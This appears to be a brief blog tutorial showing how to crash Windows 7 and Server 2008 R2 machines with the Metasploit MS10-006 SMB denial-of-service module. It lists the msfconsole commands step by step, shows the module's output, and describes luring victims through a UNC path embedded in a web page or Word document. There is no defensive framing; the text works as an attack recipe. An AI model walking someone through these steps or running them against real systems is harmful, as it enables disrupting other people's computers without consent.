DOS ATTACK ON WINDOWS-7 USING METASPLOIT 2016

This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB  server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word 
document otherwise.

DOS ATTACK ON WINDOWS-7 USING METASPLOIT 2016
DOS ATTACK ON WINDOWS-7 USING METASPLOIT 2016


(1)msfconsole

(2)use dos/windows/smb/ms10_006_negotiate_response_loop

(3)show options

(4)set SRVHOST I.P. of local machine 


(5)exploit

[*] Starting the malicious SMB service...

[*] To trigger, the vulnerable client should try to access: \\I.P.\Shared\Anything

[*] Server started.

If the system that accessed that location is vulnerable, it will immediately freeze. To get out of that state, restart the system.

No comments:

Powered by Blogger.